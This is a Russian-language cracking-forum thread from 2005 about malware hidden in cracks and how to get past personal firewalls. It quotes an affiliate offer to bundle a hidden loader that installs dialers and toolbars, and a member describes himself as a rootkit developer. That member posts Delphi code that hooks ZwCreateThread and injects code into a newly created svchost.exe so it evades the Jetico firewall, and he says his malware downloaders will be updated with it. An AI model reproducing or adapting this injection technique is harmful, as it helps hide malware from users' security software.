Русский / Russian English / Английский

Сейчас на форуме: (+1 невидимый пользователь)
 · Начало · Статистика · Регистрация · Поиск · ПРАВИЛА ФОРУМА · Язык · RSS ·

 eXeL@B —› Крэки, обсуждения —› Андеграунд совсем обнаглел
<< . 1 . 2 .
Посл.ответ Сообщение


Ранг: 535.7 (!)
Статус: Администратор
Создатель CRACKL@B

Создано: 24 ноября 2005 12:35 New!
Цитата · Личное сообщение · #1

Во мне что по мэйлу пришло:

Предлагаю нам с вами работать вместе, суть заключается в том что мы платим за
инсталлы нашего софта, это делается так вебмастер размещает у себя на сайте
срытый ифрэйм код, когда юзер туда заходит ему сливается на автомате лоадер
который скрытно устанавливает наше по, в него входят тулбар, диалер и смена
хоумпаги. Так вот я предлагаю вам просто интегрировать наш лоадер(ехе файл), в
свои патчи и прочие кряки, он весит всего 4кб, и когда юзер будет запускать
ваш кряк, ему будет ставится наш софт, обычно чтоб не выдавать себя софт
активизируется через 15-30 минут... Теперь самое интересное, для работы с нами
вам необходимо зарегистрироваться на нашем сайте и сообщить об этом мне, чтоб
я вас активизировал... теперь поговорим об оплате, мы платим от 80 до 500
долларов за 1000 инсталов нашего софта.. для более подробной информации вот
мои контактные данные:
ччтп://leonex.iframecash.biz/ (хз, там может быть тоже трой).
icq: 238726537

Ранг: 78.3 (постоянный)
Статус: Участник

Создано: 26 ноября 2005 13:39 New!
Цитата · Личное сообщение · #2

arnix пишет:
А что им мешает просто джойнером склеить кряк с заразой, тут уже никакая защита не поможет...

Так нет, на сайте тимы в описании кряка его размер и контрольная сумма.


Ранг: 467.7 (мудрец)
Статус: Участник
Иной :)

Создано: 26 ноября 2005 13:41 New!
Цитата · Личное сообщение · #3

ASMax Gideon Vi Ms-Rem не соррьтесь А то щас будет явный оффтоп. И разведете тему кто круче Как я уже написал при большом желании ломается/обходится всё. Но в стандартных ситуациях частенько спасает фаер подобраный с умом и настроенный как следует.


Ранг: 467.7 (мудрец)
Статус: Участник
Иной :)

Создано: 26 ноября 2005 13:45 New!
Цитата · Личное сообщение · #4

fakit
Полагаешь юзвер полезет на сайт тимы чтобы сравнить контрольную сумму кряка найденого на каком нить cracks.am? Емуб побыстрее прогу активировать и насладиться всеми прелестями... В общем пока человек сам не научится на своих ошибках ему никто ничем не поможет! Он как был ботом так и останется им.


Ранг: 1122.0 (!!!!)
Статус: Участник

Создано: 26 ноября 2005 15:58 New!
Цитата · Личное сообщение · #5

[HEX], никто не ссорится Я задал вопрос Ms-Rem, так как его квалификация в данном вопросе явно выше моей.
"50 строк" - это, я так понимаю, чтобы выйти под маской какого-нибудь "правильного" приложения, типа IEXPLORE.EXE... но у того же оутпуста весьма толковый анализатор, так что куча приватных и не очень троев, до недавнего времени удачно юзавших эту возможность, теперь нервно курят. Значит, если не ломать фаер, то можно чувстовать себя в относительной безопасности...


Ранг: 467.7 (мудрец)
Статус: Участник
Иной :)

Создано: 26 ноября 2005 16:09 New!
Цитата · Личное сообщение · #6

Gideon Vi
Ну есть методы которые и не требуют изменения приложения или его компонентов. Просто нужно немного смекалки и изощерености. Так что если задаться целью затроянить цель, то почти всегда можно этого добится.

Ранг: 78.3 (постоянный)
Статус: Участник

Создано: 26 ноября 2005 16:13 New!
Цитата · Личное сообщение · #7

[HEX]
я полезу, ты полезешь, еще другой десяток ;) А кто на остальных НАС_рать


Ранг: 120.6 (ветеран)
Статус: Участник
rootkit developer

Создано: 26 ноября 2005 18:39 New!
Цитата · Личное сообщение · #8

Gideon Vi

Вот один из примеров закачки файла в обход фаерволла (в том числе контрольк компонентов идет лесом).
Закачка идет через процесс svchost.exe который в дефолтовых правиилах фаерволлов имеет доступ по 80 порту. Этот метод используется в простеньких довнлоадерах для массовых ботов.
Для установки профессионального spyware используется более прокачаная разновидность этого метода, в которой автоматически определяется имеющий доступ к http процесс, в этом случае идет лесом даже хорошо настроеный фаерволл.
Самые лучшие spyware тулы используют более сложные методы обхода фаерволла (на уровне ядра), которые позволяют работать с сетью так, как будто фаерволла вобще не существует (даже если вся сетевая активность запрещена).

Короче говоря, с учетом всего вышесказаного кряки лучше всего запускать только в VmWare

{ Атач доступен только для участников форума }

Ранг: 3.4 (гость)
Статус: Участник

Создано: 26 ноября 2005 21:01 New!
Цитата · Личное сообщение · #9

Ms-Rem пишет:
кряки лучше всего запускать только в VmWare

Или из архивов, подписанных электронной подписью.


Ранг: 467.7 (мудрец)
Статус: Участник
Иной :)

Создано: 27 ноября 2005 00:16 · Поправил: [HEX] New!
Цитата · Личное сообщение · #10

Эмм... ну раз на то пошло то есть еще одна идея личного характера...
Что мешает троянцу создать файл для отправки на ружу с нужной для нас инфой + html файл закачки на определеный сервачек полезного нам файла и этот html файл выставить домашней страницей. Впринципе никаких нарушений в системен не производим... браузеру скорей всего доступ в инет разрешен... Так что в 80% ведро будет затроянено должным образом. Надеюсь эта инфа не уйдет дальше этого фрума и не проявится в виде новых троянов и прочей фигни

Ранг: 20.9 (новичок)
Статус: Участник

Создано: 27 ноября 2005 00:28 New!
Цитата · Личное сообщение · #11

Ms-Rem пишет:
в которой автоматически определяется имеющий доступ к http процесс, в этом случае идет лесом даже хорошо настроеный фаерволл.

В нормальных файрах есть контроль использования CreateRemoteThread/WriteProcessMemory процессом. Правила из области "Process attack rule". Т.е. внедрение кода в чужой процесс и запуск его контролируется. Имхо, не прокатит.
Ms-Rem пишет:
более сложные методы обхода фаерволла (на уровне ядра)

Если еще и вирусы в ring0 появятся, тогда вооще труба...

Ранг: 20.9 (новичок)
Статус: Участник

Создано: 27 ноября 2005 00:33 New!
Цитата · Личное сообщение · #12

[HEX] пишет:
Что мешает троянцу создать файл для отправки на ружу с нужной для нас инфой + html файл закачки на определеный сервачек полезного нам файла

А как этот файл отправить ? Если через форму, то вначале кнопку Submit нажать надо. А javascript вроде отправлять файлы сам не может...

Ранг: 78.3 (постоянный)
Статус: Участник

Создано: 27 ноября 2005 01:07 New!
Цитата · Личное сообщение · #13

FKMA пишет:
В нормальных файрах есть контроль использования CreateRemoteThread/WriteProcessMemory процессом

Ага, у аутпоста 3.0 написанна такая фигня в фишка, но я не тестил.


Ранг: 120.6 (ветеран)
Статус: Участник
rootkit developer

Создано: 27 ноября 2005 06:47 New!
Цитата · Личное сообщение · #14

[quote]ак что в 80% ведро будет затроянено должным образом. Надеюсь эта инфа не уйдет дальше этого фрума и не проявится в виде новых троянов и прочей фигни[/quote]
Да и незачем такие извращения, все делается гораздо проще.


>> Имхо, не прокатит.

А ты сначала проверь пример из атача. В данном случае фаерволл не может контролировать WriteProcessMemory (это связано с одним из ключевых принципов работы Windows). В общем теорию этого метода я обьяснять не буду, кому надо тот и сам догадается. Единственный фаерволл которые может эту реалиацию отлавливать - это ZoneAlarm, но против него тоже можно использовать этот же метод с небольшими модификациями, естественно их приводить я тоже не буду.
Короче, если кто не верит что это работает, пусть проверит сам.

Ранг: 20.9 (новичок)
Статус: Участник

Создано: 27 ноября 2005 09:39 New!
Цитата · Личное сообщение · #15

Ms-Rem пишет:
А ты сначала проверь пример из атача. В данном случае фаерволл не может контролировать WriteProcessMemory (это связано с одним из ключевых принципов работы Windows).


Jetico Personal Firewall прекрасно отловил попытку
Event: attacker writes to application's memory
Attacker: E:\FASM\2103_FireFuck.exe

Так что не прокатывает пока ;) Можно спать спокойно


Ранг: 120.6 (ветеран)
Статус: Участник
rootkit developer

Создано: 27 ноября 2005 12:47 New!
Цитата · Личное сообщение · #16

Ща поставлю этот фаер и проверю, но не жумай что можно спать спокойно, есть и более серьезные методы обхода.


Ранг: 535.7 (!)
Статус: Администратор
Создатель CRACKL@B

Создано: 27 ноября 2005 13:22 New!
Цитата · Личное сообщение · #17

Горько смотреть когда талантливые люди озабочены разработкой опасных троянов.


Ранг: 120.6 (ветеран)
Статус: Участник
rootkit developer

Создано: 27 ноября 2005 13:32 · Поправил: Ms-Rem New!
Цитата · Личное сообщение · #18

>>Jetico Personal Firewall прекрасно отловил попытку

Странно, я сейчас проверил на Jetico Personal Firewall 1.0.1.61, и файл скачался успешно.
Какая у тебя версия фаерволла, и как его нужно настроить чтобы он отлавливал вышеприведенный пример?
Если он действительно его отлавливает (что неудивительно, так как я его полгода назад на паблик выложил), то могу точно сказать что это ненадолго.

Немного теории:
При запуске процесса происходит сначала чоздание его адресного пространства (ZwCreateProcess), затем создание его PEB и заполнение ее начальными значениями (командная строка, переменные окружения и.т.д.), в этом момент родительский процесс ПИШЕТ В ПАМЯТЬ ДОЧЕРНЕГО. После чего создается первый поток процесса (ZwCreateThread) и запускается (ZwResumeThread).
Вышеприведенный пример основан на том, что фаерволлы не контролируют запись в память процесса до момента старта его первого потока (по вышеприведенным причинам). Процесс создается в приостановленом состоянии, в него записывается код и меняется стартовый контекст потока.
Обнаружение этого метода обхода фаерволла возможно путем контроля диапазона адресов памяти по которым происходит запись при создании процесса. Если фаерволлы уже это делают, то мне просто нужно будет записать шелкод в диапазон аресов PEB, и в этом случае просто НЕВОЗМОЖНО 100% достоверно отличить такую атаку от нормального запуска процесса.


Ранг: 420.3 (мудрец)
Статус: Участник

Создано: 27 ноября 2005 13:40 New!
Цитата · Личное сообщение · #19

Bad_guy пишет:
Горько смотреть когда талантливые люди озабочены разработкой опасных троянов.

Ms-Rem, правда, может не стоит Ms-Rem пишет:
Если он действительно его отлавливает (что неудивительно, так как я его полгода назад на паблик выложил), то могу точно сказать что это ненадолго.

Вирь, собранный из твоих исходников, уже был на этом сайте. А в твоей компетентности никто и не сомневается...

Ранг: 20.9 (новичок)
Статус: Участник

Создано: 27 ноября 2005 14:09 · Поправил: FKMA New!
Цитата · Личное сообщение · #20

Ms-Rem пишет:
я сейчас проверил на Jetico Personal Firewall 1.0.1.61, и файл скачался успешно.

Версия такая же.
Ms-Rem пишет:
как его нужно настроить чтобы он отлавливал вышеприведенный пример?

Специально настраивать не надо (я не настраивал).
Система WXP SP2.
Ms-Rem пишет:
Если фаерволлы уже это делают, то мне просто нужно будет записать шелкод в диапазон аресов PEB

Джетика хучит ZwWriteVirtualMemory в ServiceDescriptionTable. Возможно она позволяет писать в PEB только в течении вызова ZwCreateProcess, вернее CreateProcess сам туда пишет. А все последующие попытки блокирует. Предполагаю, что если ты попробуешь писать в PEB после возврата из ZwCreateProcess, то все равно она перехватит.


Ранг: 120.6 (ветеран)
Статус: Участник
rootkit developer

Создано: 27 ноября 2005 15:53 New!
Цитата · Личное сообщение · #21

Jetico у меня не ловил этот пример потому, что один из моих драйверов мешал ему хукать SDT.
Он действительно отлавливает этот пример, и я сейчас более подробно исследовал его работу.
Jetico помимо ZwWriteVirtualMemory хукает еще и ZwCreateThread.
Так как запись в память процесса при его создании происходит до создания потока, то после вызова ZwCreateThread начинает работать контроль. После создания первого потока может происходить еще одна запись в PEB (при установке некоторых полей PEB), поэтому после создания, но до запуска потока еще можно записывать в PEB, но не более 20 байт (проверка идет в обработчике хука ZwWriteVirtualMemory драйвера фаерволла).
В общем неплохой метод защиты, но если чуток пораскинуть мозгами, то и эта защита идет лесом, для этого нужно записать в память процесса сразу же после создания адресного пространства и не использовать CreateRemoteThread для запуска кода. Ниже приведен пример инжекта в дочерний процесс который я накатал за 5 минут.

program Project2;

uses
windows, advApiHook, NativeApi;

procedure InjectProc();
asm
@a:
jmp @a
end;
procedure InjectEnd(); asm end;

var
TrueZwCreateThread: function(ThreadHandle: pdword;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: pointer;
ProcessHandle: THandle;
ClientId: PClientID;
ThreadContext: PContext;
UserStack: pointer;
CreateSuspended: boolean):NTStatus;
stdcall;
EpAddr: pointer;

Function NewZwCreateThread(ThreadHandle: pdword;
DesiredAccess: ACCESS_MASK;
ObjectAttributes: pointer;
ProcessHandle: THandle;
ClientId: PClientID;
ThreadContext: PContext;
UserStack: pointer;
CreateSuspended: boolean):NTStatus;
stdcall;
var
Bytes: dword;
InjSize: dword;
begin
InjSize := dword(@InjectEnd) - dword(@InjectProc);
WriteProcessMemory(ProcessHandle, EpAddr, @InjectProc, InjSize, Bytes);
Result := TrueZwCreateThread(ThreadHandle, DesiredAccess, ObjectAttributes,
ProcessHandle, ClientId, ThreadContext,
UserStack, CreateSuspended);
end;

var
si: TStartupInfo;
pi: TProcessInformation;
dHdr: PIMageDosHeader;
nHdr: PImageNtHeaders;

begin
dHdr := pointer(LoadLibraryEx('svchost.exe', 0, DONT_RESOLVE_DLL_REFERENCES));
nHdr := pointer(dword(dHdr) + dHdr^._lfanew);
EpAddr := pointer(nHdr^.OptionalHeader.AddressOfEntryPoint + nHdr^.OptionalHeader.ImageBase);
HookProc('ntdll.dll', 'ZwCreateThread', @NewZwCreateThread, @TrueZwCreateThread);
ZeroMemory(@Si, sizeof(Si));
si.cb := sizeof(si);
CreateProcess(nil, 'svchost.exe', nil, nil, false, 0, nil, nil, si, pi);
end.


Этот пример показывает воможность обхода Jetico. Пока что нет времени довести его до ума, но через пару дней все довнлоадеры будут обновлены с учетом всего вышесказаного.

FKMA - большое тебе спасибо за помощь!

Ранг: 20.9 (новичок)
Статус: Участник

Создано: 27 ноября 2005 22:00 New!
Цитата · Личное сообщение · #22

Ms-Rem пишет:
Этот пример показывает воможность обхода Jetico.

Черт, до безобразия хороший способ Это тебе спасибо за исследование.
Придется теперь разрабам джетики писать, чтоб получше эту проверку реализовали

Ранг: 45.1 (посетитель)
Статус: Участник

Создано: 28 ноября 2005 19:22 New!
Цитата · Личное сообщение · #23

Вот в продолжение темы (по Асе пришло):

halmer (15:01:43 28/11/2005)
привет. ты знаешь место где программы за бабки ломают? сам не можешь взяться ?


Вот сижу и думаю кто такой halmer и где я Асю засветил


Ранг: 535.7 (!)
Статус: Администратор
Создатель CRACKL@B

Создано: 28 ноября 2005 22:12 New!
Цитата · Личное сообщение · #24

xDriver
Асю ты засветил тут
http://exelab.ru/f/index.php?action=userinfo&user=587

...а вообще оффтоп пошёл, тему закрываю.
<< . 1 . 2 .
 eXeL@B —› Крэки, обсуждения —› Андеграунд совсем обнаглел
Эта тема закрыта. Ответы больше не принимаются.

Видеокурс ВЗЛОМ